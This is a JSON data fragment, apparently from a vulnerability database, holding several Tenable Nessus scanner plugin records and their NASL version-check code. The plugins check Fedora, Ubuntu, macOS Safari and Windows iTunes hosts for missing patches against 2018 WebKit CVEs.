"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:20:36", "description": "This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4190),\n [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4199),\n [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4218),\n [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4222),\n [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4232),\n [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4233),\n [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4246),\n [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-02T00:00:00", "title": "Fedora 27 : webkitgtk4 (2018-aac3ca8936)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4232"], "modified": "2018-07-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:webkitgtk4"], "id": "FEDORA_2018-AAC3CA8936.NASL", "href": "https://www.tenable.com/plugins/nessus/110823", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-aac3ca8936.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110823);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n script_xref(name:\"FEDORA\", value:\"2018-aac3ca8936\");\n\n script_name(english:\"Fedora 27 : webkitgtk4 (2018-aac3ca8936)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4190](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4190),\n [CVE-2018-4199](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4199),\n [CVE-2018-4218](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4218),\n [CVE-2018-4222](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4222),\n [CVE-2018-4232](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4232),\n [CVE-2018-4233](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4233),\n [CVE-2018-4246](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4246),\n [CVE-2018-11646](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2018-11646).\n\nAdditional fixes :\n\n - Fix installation directory of API documentation.\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Properly detect compiler flags, needed libs, and\n fallbacks for usage of 64-bit atomic operations.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-aac3ca8936\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"webkitgtk4-2.20.3-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T10:55:38", "description": "A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-19T00:00:00", "title": "Ubuntu 16.04 LTS / 17.10 / 18.04 LTS : WebKitGTK&#43; vulnerabilities (USN-3687-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-12293", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "modified": "2018-06-19T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts"], "id": "UBUNTU_USN-3687-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110611", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3687-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110611);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-12293\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n script_xref(name:\"USN\", value:\"3687-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.10 / 18.04 LTS : WebKitGTK&#43; vulnerabilities (USN-3687-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3687-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.10|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.10 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.3-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.3-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.3-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.3-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.3-0ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.3-0ubuntu0.18.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:24:07", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.1.1 It is, therefore,\naffected by multiple vulnerabilities.\n\n- A remote code execution vulnerability exists in WebKit due to improper memory handling.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted\n web page to to execute arbitrary code or cause a denial of service\n (CVE-2018-4199, CVE-2018-4201, CVE-2018-4218, CVE-2018-4233).\n\n- An information disclosure vulnerability exists in WebKit. An unauthenticated,\n remote attacker can exploit this, via a specifically crafted web page,\n to disclose potentially sensitive information (CVE-2018-4190).\n\n- An out-of-bounds read error exists in WebKit due to improper input validation.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted web page\n that leverages a getWasmBufferFromValue during WebAssembly compilation to execute arbitrary\n code (CVE-2018-4222).\n", "edition": 16, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-07-02T00:00:00", "title": "macOS : Apple Safari < 11.1.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4188", "CVE-2018-4205", "CVE-2018-4199", "CVE-2018-4190", "CVE-2018-4277", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4247", "CVE-2018-4232"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/a:apple:safari"], "id": "MACOSX_SAFARI11_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/126381", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126381);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/07/05 9:53:32\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4199\",\n \"CVE-2018-4201\",\n \"CVE-2018-4205\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4246\",\n \"CVE-2018-4247\",\n \"CVE-2018-4277\"\n );\n script_bugtraq_id(104358, 104366);\n\n script_name(english:\"macOS : Apple Safari < 11.1.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.1.1 It is, therefore,\naffected by multiple vulnerabilities.\n\n- A remote code execution vulnerability exists in WebKit due to improper memory handling.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted\n web page to to execute arbitrary code or cause a denial of service\n (CVE-2018-4199, CVE-2018-4201, CVE-2018-4218, CVE-2018-4233).\n\n- An information disclosure vulnerability exists in WebKit. An unauthenticated,\n remote attacker can exploit this, via a specifically crafted web page,\n to disclose potentially sensitive information (CVE-2018-4190).\n\n- An out-of-bounds read error exists in WebKit due to improper input validation.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted web page\n that leverages a getWasmBufferFromValue during WebAssembly compilation to execute arbitrary\n code (CVE-2018-4222).\n\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208854\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 11.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4199\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_apple_safari_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item('Host/MacOSX/Version');\nif (!os) audit(AUDIT_OS_NOT, 'Mac OS X or macOS');\n\nif (!preg(pattern:\"Mac OS X 10\\.(11|12|13)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, 'Mac OS X El Capitan 10.11 / macOS Sierra 10.12 / macOS High Sierra 10.13');\n\nget_kb_item_or_exit('MacOSX/Safari/Installed', exit_code:0);\npath = get_kb_item_or_exit('MacOSX/Safari/Path', exit_code:1);\nversion = get_kb_item_or_exit('MacOSX/Safari/Version', exit_code:1);\n\nfixed_version = '11.1.1';\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', fixed_version\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Safari', version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:18:28", "description": "The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.5. It is, therefore, affected by multiple vulnerabilities\nas referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 25, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-06T00:00:00", "title": "Apple iTunes < 12.7.5 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4225", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_5.NASL", "href": "https://www.tenable.com/plugins/nessus/110384", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110384);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4199\",\n \"CVE-2018-4200\",\n \"CVE-2018-4201\",\n \"CVE-2018-4204\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4224\",\n \"CVE-2018-4225\",\n \"CVE-2018-4226\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4246\"\n );\n script_bugtraq_id(103961, 104378);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-06-01-7\");\n\n script_name(english:\"Apple iTunes < 12.7.5 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.5. It is, therefore, affected by multiple vulnerabilities\nas referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208852\");\n # https://lists.apple.com/archives/security-announce/2018/Jun/msg00006.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?375c8685\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4246\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.7.5\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:18:34", "description": "The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.5. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 25, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-06T00:00:00", "title": "Apple iTunes < 12.7.5 Multiple Vulnerabilities (uncredentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4225", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_5_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/110383", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110383);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4199\",\n \"CVE-2018-4200\",\n \"CVE-2018-4201\",\n \"CVE-2018-4204\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4224\",\n \"CVE-2018-4225\",\n \"CVE-2018-4226\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4246\"\n );\n script_bugtraq_id(103961, 104378);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-06-01-7\");\n\n script_name(english:\"Apple iTunes < 12.7.5 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.5. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version 